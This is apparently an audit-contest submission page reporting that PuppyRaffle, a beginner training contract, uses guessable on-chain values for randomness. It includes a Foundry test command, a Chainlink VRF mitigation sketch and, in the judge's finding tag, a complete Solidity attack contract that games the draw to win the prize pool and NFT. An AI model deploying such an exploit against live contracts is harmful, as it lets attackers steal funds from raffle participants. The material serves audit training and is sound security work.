Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Winner selection uses manipulable on-chain values, allowing the caller to bias the raffle outcome

cryptobloc

Winner selection uses manipulable on-chain values, allowing the caller to bias the raffle outcome

Affected Contract

src/PuppyRaffle.sol

Affected Code

selectWinner derives randomness from msg.sender, block.timestamp, and block.difficulty.

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

Rarity is also derived from msg.sender and block.difficulty.

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Description

The raffle uses predictable and influenceable values as randomness. selectWinner is permissionless, so the caller is part of the random seed. An attacker can search for a caller address that produces a desired winnerIndex, then call selectWinner from that address when the known block values match the calculation.

Block producers have even stronger influence because they can affect timestamp and transaction ordering. This breaks the core raffle guarantee that winners and NFT rarity are fairly random.

Risk

The raffle outcome can be steered by a participant or transaction sender instead of being random. This lets an attacker unfairly capture the prize pool, mint the puppy NFT to a chosen winner, and potentially influence rare NFT traits.

Impact

High. A participant can bias or force the winner selection and capture the prize pool and puppy NFT unfairly. The same randomness weakness can also bias NFT rarity.

Likelihood

Medium. The attack depends on controlling or preparing the caller address and timing the draw, but the function is permissionless and all seed inputs are public or influenceable.

Proof of Concept

Added test: test/AuditFindings.t.sol

Run:

forge test --match-test testWeakRandomnessAllowsCallerToForceWinner -vvv

The test:

Four players enter the raffle.
The raffle duration passes.
The test searches for a caller address that makes winnerIndex == 0.
Calling selectWinner from that address makes playerOne the winner.

Recommended Mitigation

Use a verifiable randomness source such as Chainlink VRF. If a two-step flow is needed, separate the request and fulfillment phases so users cannot choose the final seed at draw time.

Do not include msg.sender, block.timestamp, or block.difficulty as the only entropy source for economically meaningful randomness.

Example mitigation pattern:

function selectWinner() external returns (uint256 requestId) {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

requestId = COORDINATOR.requestRandomWords(

keyHash,

subscriptionId,

requestConfirmations,

callbackGasLimit,

);

}

function fulfillRandomWords(uint256, uint256[] memory randomWords) internal override {

uint256 randomWord = randomWords[0];

uint256 winnerIndex = randomWord % players.length;

address winner = players[winnerIndex];

uint256 rarity = (randomWord / players.length) % 100;

// Continue prize payout, fee accounting, rarity assignment, and minting here.

}

The important security property is that the final random value is provided by the VRF coordinator after the request, not chosen from caller-controlled or block-producer-influenceable inputs inside selectWinner.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!